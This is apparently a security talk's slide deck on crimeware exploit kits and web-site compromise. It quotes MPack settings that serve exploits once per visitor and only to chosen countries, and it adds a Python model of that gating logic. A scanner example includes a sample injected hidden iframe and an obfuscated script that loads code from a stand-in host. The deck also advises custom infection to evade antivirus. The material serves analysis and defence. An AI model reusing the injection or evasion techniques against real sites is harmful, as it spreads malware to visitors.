iamit.org
Who Am I ? (iamit)
Today’s Agenda
• Terminology
• Past vs. Present – 10,000 feet view
• Business Impact
• Key Characteristics – what does it look like?
– Anti-Forensics techniques
– Propagation methods
• What is the motive (what are they looking for)?
• Tying it all up – what does it look like when successful.
• Anything in it for us to learn from?
– Looking forward on extrusion testing methodologies
Some Terminology
Federal Prosecutor: “Cybercrime Is Funding Organized Crime”
How Does e-Crime get Business Data?
The business impact of E-Crime
(diagram: sophisticated and organized criminals targeting employee data and financial data)
• Data theft
• Password theft
• Identity theft
• Compromised computers to steal resources
• Employee productivity loss
The Business Impact Of E-Crime
Detection Evasion
• Code obfuscation
– Not the one you are used to…
• Geographical preference
– More on this later when we talk $$$…
Dynamic Code Obfuscation
Dynamic Code Obfuscation – the Neosploit way (2.0.15)
Obfuscation and IFRAMES
Crimeware Toolkits
A glimpse into the code
Neosploit code
Location, Location, Location
• Have you been to our fine establishment before?
– You can only get the “good” stuff once…
• Where do you come from?
– You may not be worth the effort…

index.php:
    //checks and saves user's IP hashed with browser
    //to avoid future browser's hangup
    function CheckAddUser() {
    …
        $rcount=@mysql_num_rows($res);
        if ($rcount>0) {
            //found data, prevent view
            echo ":[";
            exit;
        } else {
            //not found, add
            $query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
            mysql_query($query);
        }
    }

settings.php:
    $BlockDuplicates=1; //send exploits only once
    $CountReferers=1; //make referrer's statistics
    $OnlyDefiniedCoutries=0; //send exploits only to countries in the list
    $CoutryList="RU US UA"; //2-letter codes ONLY! (see readme for details)

Source: MPack 0.94 source code
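The gating logic on this slide, modelled in Python as an added example. This is not MPack's code: the setting names are taken from the settings.php excerpt above (misspellings included), while the in-memory set standing in for the MySQL table, the MD5 of IP plus User-Agent, the hard-coded GeoIP table and the order in which the two checks run are my assumptions.

```python
import hashlib

# Settings mirroring MPack 0.94's settings.php (names kept as in the kit,
# misspellings included); the values are chosen for this demo.
DEFAULT_SETTINGS = {
    "BlockDuplicates": True,        # send exploits only once per IP+User-Agent
    "OnlyDefiniedCoutries": False,  # restrict delivery to CoutryList
    "CoutryList": "RU US UA",       # 2-letter codes
}

# Constructed stand-in for the kit's GeoIP lookup (assumption: the kit resolves
# the visitor IP to a 2-letter country code before applying the country filter).
FAKE_GEOIP = {
    "203.0.113.7": "US",
    "198.51.100.9": "DE",
    "192.0.2.44": "RU",
}


def ipua_key(ip: str, user_agent: str) -> str:
    """Identity of a visitor as the kit sees it: a hash of IP + User-Agent ($ipua).
    MD5 is an assumption; the kit only needs a stable key."""
    return hashlib.md5(f"{ip}|{user_agent}".encode()).hexdigest()


class ExploitGate:
    """Decides whether a visitor gets the exploit page or the ':[' marker
    (stand-in for index.php's CheckAddUser() and the <dbstats>_users table)."""

    def __init__(self, settings=None):
        self.settings = dict(DEFAULT_SETTINGS, **(settings or {}))
        self.seen = set()  # IP+UA hashes already served; the kit keeps these in MySQL

    def serve(self, ip: str, user_agent: str) -> str:
        s = self.settings
        # Country filter first (assumed order): visitors outside the list are
        # not worth the effort and are not even recorded.
        if s["OnlyDefiniedCoutries"]:
            allowed = s["CoutryList"].split()
            if FAKE_GEOIP.get(ip) not in allowed:
                return ":["
        # Duplicate filter: the "good stuff" is delivered once per IP+UA.
        if s["BlockDuplicates"]:
            key = ipua_key(ip, user_agent)
            if key in self.seen:
                return ":["
            self.seen.add(key)
        return "<exploit page>"


def demo() -> list:
    """Four visits against a gate with the country filter switched on."""
    gate = ExploitGate({"OnlyDefiniedCoutries": True})
    ua = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    return [
        gate.serve("203.0.113.7", ua),           # US, first visit: served
        gate.serve("203.0.113.7", ua),           # same IP+UA again: ':['
        gate.serve("203.0.113.7", ua + " SV1"),  # same IP, new UA: served again
        gate.serve("198.51.100.9", ua),          # DE, not in CoutryList: ':['
    ]


if __name__ == "__main__":
    for outcome in demo():
        print(outcome)
```

The practical consequence for an analyst: a second fetch of the exploit page from the same sandbox address and browser string returns only “:[”, so retrieving a sample means changing the User-Agent or the source address, and a sandbox located outside $CoutryList never receives the exploit at all.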
Evasive attacks – increasing the infection rates
Propagation techniques
On My Site? No way!
Way… It’s all business!
And when the business is booming…
And there’s a “no code” trick as well
Happy neighbors…
What’s the end game?
Full-Circle
(diagram, a cycle: user infected with Trojan → Trojan sends credentials → credentials used to modify content of websites → user attacked while browsing → user infected with Trojan …)
The last server we analyzed contained more than 200,000 stolen FTP credentials on it.
It had government sites, universities, and Fortune 500 companies on it.
More than 50% of the credentials were valid…
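Two checks a site owner can run against the "modify content of websites" step of this cycle, as an added example that is not from the talk: a hash baseline that flags files changed through stolen FTP credentials, and a heuristic scan for hidden iframes, unescape()/eval() decoder calls and content appended after the closing </html>. The sample pages, file names and regexes are constructed for this illustration.

```python
import hashlib
import re

# Constructed sample: a clean page, and the same page after an intruder with
# the site's FTP credentials appended a hidden iframe and an unescape() blob.
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="http://example.com/partner" width="300" height="250"></iframe>
</body></html>
"""

INJECTED_TAIL = """<iframe src="http://198.51.100.9/in.cgi?3" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http://192.0.2.44/x.js%22%3E%3C/script%3E'));</script>
"""

INFECTED_PAGE = CLEAN_PAGE + INJECTED_TAIL

# Heuristics (my own): iframes sized to nothing or hidden by CSS, classic
# decoder idioms, and anything placed after the document's closing tag.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN_RE = re.compile(
    r"""(width|height)\s*=\s*["']?0(?!\d)|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)
DECODER_RE = re.compile(
    r"(document\.write|eval)\s*\(\s*unescape\s*\(|String\.fromCharCode", re.I)
HTML_END_RE = re.compile(r"</html>", re.I)


def scan_page(html: str) -> list:
    """Return (kind, snippet) findings for one HTML document."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        if HIDDEN_RE.search(m.group(0)):
            findings.append(("hidden_iframe", m.group(0)[:60]))
    for m in DECODER_RE.finditer(html):
        findings.append(("decoder_call", html[m.start():m.start() + 40]))
    parts = HTML_END_RE.split(html, maxsplit=1)
    if len(parts) == 2 and parts[1].strip():
        findings.append(("content_after_html", parts[1].strip()[:60]))
    return findings


def fingerprint(files: dict) -> dict:
    """path -> SHA-256 of content; take this while the site is known good."""
    return {p: hashlib.sha256(body.encode()).hexdigest() for p, body in files.items()}


def changed_files(baseline: dict, current: dict) -> list:
    """Paths whose hash differs from the baseline or that did not exist in it."""
    return sorted(p for p, h in current.items() if baseline.get(p) != h)


def demo() -> dict:
    """Baseline the clean site, then inspect it after the injection."""
    baseline = fingerprint({"index.html": CLEAN_PAGE})
    now = {"index.html": INFECTED_PAGE, "images/in.php": "<?php /* dropped file */ ?>"}
    changed = changed_files(baseline, fingerprint(now))
    return {
        "changed": changed,
        "findings": {p: [k for k, _ in scan_page(now[p])]
                     for p in changed if p.endswith(".html")},
    }


if __name__ == "__main__":
    print(demo())
```

The baseline comparison is the reliable half: a modification made with valid FTP credentials leaves no exploit trace, only a changed or new file. The content heuristics are there to prioritise which changed files to read first, and they will not catch every obfuscation variant.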
Keeping in control
Neosploit
Local Crimeware Effect
• Don’t let your eyes off the ball… (the SSL icon?)
Play-by-play…
Where are we going to?
Trojans 2.0 Illustrated
Old vulnerabilities – old problem
Taken from “Understanding web browser threat: examination of vulnerable online web browser populations and the ‘insecurity iceberg’”, http://www.techzoom.net/insecurity-iceberg
From the field…
So how do I use this?
• Extrusion Testing
– The ugly half-brother of pen-testing
– Gaining a lot of momentum
– Uses tried-and-tested methods (social engineering, passive external fingerprinting, work the CEO’s secretary rather than the security administrator…)
• Arsenal includes:
– Toolkits (told you these things are useful)
– Updated exploits for recent vulnerabilities
– Custom infection (you don’t want to end up being blocked by an AV when you do have a chance to get in) – not for the faint of heart
– Chutzpah (someone come up with an English phrase for it!)
Future directions of web security
Q&A